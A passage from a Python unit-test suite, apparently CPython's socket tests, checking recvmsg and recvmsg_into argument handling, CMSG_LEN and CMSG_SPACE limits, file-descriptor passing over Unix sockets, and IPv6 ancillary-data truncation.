self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
